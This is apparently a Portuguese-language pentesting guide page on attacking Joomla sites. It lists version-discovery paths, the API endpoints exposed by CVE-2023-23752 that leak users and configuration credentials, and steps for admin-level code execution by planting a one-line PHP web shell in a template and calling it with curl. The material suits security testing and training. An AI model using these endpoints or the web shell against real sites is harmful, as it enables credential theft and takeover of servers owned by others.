Joomla
Estatísticas do Joomla
O Joomla coleta algumas estatísticas de uso anônimas, como a distribuição das versões do Joomla, PHP e banco de dados e sistemas operacionais de servidor em uso nas instalações do Joomla. Esses dados podem ser consultados por meio de sua API pública.
Enumeração
Descoberta/Rastreamento
Verifique o meta
robots.txt
README.txt
Versão
Em /administrator/manifests/files/joomla.xml você pode ver a versão.
Em /language/en-GB/en-GB.xml você pode obter a versão do Joomla.
Em plugins/system/cache/cache.xml você pode ver uma versão aproximada.
API Divulgação de Informações Não Autenticadas:
As versões de 4.0.0 a 4.2.7 são vulneráveis à divulgação de informações não autenticadas (CVE-2023-23752) que irá expor credenciais e outras informações.
Usuários:
http://<host>/api/v1/users?public=true
Arquivo de Configuração:
http://<host>/api/index.php/v1/config/application?public=true
Módulo MSF: scanner/http/joomla_api_improper_access_checks
ou script ruby: 51334
Força Bruta
Você pode usar este script para tentar força bruta no login.
RCE
Se você conseguiu obter credenciais de admin, você pode RCE dentro dela adicionando um trecho de código PHP para obter RCE. Podemos fazer isso personalizando um template.
Clique em
Templates
na parte inferior esquerda emConfiguração
para abrir o menu de templates.Clique em um nome de template. Vamos escolher
protostar
sob o cabeçalhoTemplate
. Isso nos levará à páginaTemplates: Customise
.Por fim, você pode clicar em uma página para abrir a fonte da página. Vamos escolher a página
error.php
. Vamos adicionar um comando PHP de uma linha para obter execução de código da seguinte forma:system($_GET['cmd']);
Salvar e Fechar
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated